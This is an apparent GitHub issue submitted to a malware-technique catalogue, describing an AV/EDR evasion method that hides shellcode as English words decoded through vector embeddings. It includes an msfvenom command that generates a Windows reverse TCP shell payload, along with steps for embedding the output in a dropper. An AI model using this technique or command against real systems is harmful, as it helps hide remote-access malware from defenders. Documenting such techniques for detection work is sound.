Unprotect_Submission icon indicating copy to clipboard operation
Unprotect_Submission copied to clipboard

AV/EDR Evasion using AI driven payload Obfuscation

Open ghostpepper108 opened this issue 8 months ago • 2 comments

AV/EDR Evasion using AI driven payload Obfuscation

Authorship information

  • Name or nickname (required): ghost_pepper108
  • Twitter: https://twitter.com/ghost_pepper108

Technique Information

  • Technique title (required): AV/EDR Evasion using AI driven payload Obfuscation
  • Technique category (required): Antivirus/EDR Evasion
  • Technique description (required): Malware developers use plenty of techniques to hide their payloads. Some of the common techniques used are obfuscating and encrypting the payload and deobfuscation/decrypting just-in-time when the payload has to be executed. This means the deobfucation logic or decryption secrets are also normally inside the dropper. There is a serious drawback though. Obfuscating/encrypting increases the entropy of the malware binary significantly. This increase in entropy becomes a red flag in the prying eyes of EDRs/AVs. That means, even if the EDR/AV cannot read the encrypted/obfucated payload, the binary gets flagged for further inspection because of its high entropy. However, malware authors do attempt to use variety of techniques to reduce the entropy.

Malware detections have evolved overtime and today's machine learning (AI) based detection tools like EDRs are extremely powerful in detecting malicious activities because they are not based on static rules but they are trained to detect malicious behaviors when a piece of code run. This technique uses AI to evade the AI based EDRs/AVs. With embedded AI in malwares, things change a lot for both offensive and defensive security. It levels the field. Its not easy anymore for EDRs/AVs to detect an AI based malware.

TLDR: After the payload is generated by AI module and the dropper is compiled with the AI generated payload, the dropper is executed. The dropper connects to the AI module, sends the English words one-by-one and the pre-trained model in AI module uses mathematical function to fetch the payload from the vectors for those English words.

This project has the following files and explained below

payload-generator.py: This is a payload generator created by Byte Viper AI engine. It converts raw hex code payload (for example msf venom) to its mathematical representations in vectors using the pre-trained machine-learning model. Here are the instructions on how to use.

  1. Create a working payload. For instance, msf venom payload would be

msfvenom -p x64 --platform windows -p windows/x64/shell_reverse_tcp lhost= lport= -f c

  • You would get something like \xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50.....
  • Remove all \x and " so that you are left with fc4883e4f0e8c000000041514150.... Use this as your input next
  • You would receive the AI generated payload which you embed it in your code
  • A ".pkl" file would also be created that hold the vectors
  • Place this file, in the same path, along with your dropper binary
  • Also place payload.py, in the same path, along with your dropper
  1. payload.py: This python file that goes along with your dropper binary. This file contains the code to get the english words from dropper and get the equivalent hex code from the AI module.

  2. ByteViper.cpp: This C file is the dropper file. This is just an example of how the payload is embedded, in seemingly benign way, using English words. This code also connects to the AI module to get the raw hex code and then assemble them in memory one byte at a time, just before executing the payload. This code can be modified to use many other techniques including remote code injection.

  3. tasks.json: This is the vscode config file that I used for compiling the code

Pros

  1. The actual payload cannot be discovered because they are represented mathematically using vector embeddings
  2. There is no encryption/obfuscation of payload, hence the entropy of the malware remains low equivalent to any benign binary
  3. Payload are represented as English words. One could potentially use any other language as well to represent the payload
  4. One could use many other techniques like digitally signing, other techniques to inject payload

Cons

  1. The AI module requires Python to be pre-installed on the target. This poc has been created using Python 3.11
  2. The AI module is dependent on other packages
  3. The performance is not great. But there are plenty of potential opportunities for improvement. For instance, the AI module checks every time if the packages are installed. This is required only for the first run and not for every run

Additional resources

  • Add any external links that can provide further information of the technique.

Code snippets

  • Please add your code in separate files.

Detection rules

  • Please add your rules in separate files.

ghostpepper108 avatar May 28 '24 15:05 ghostpepper108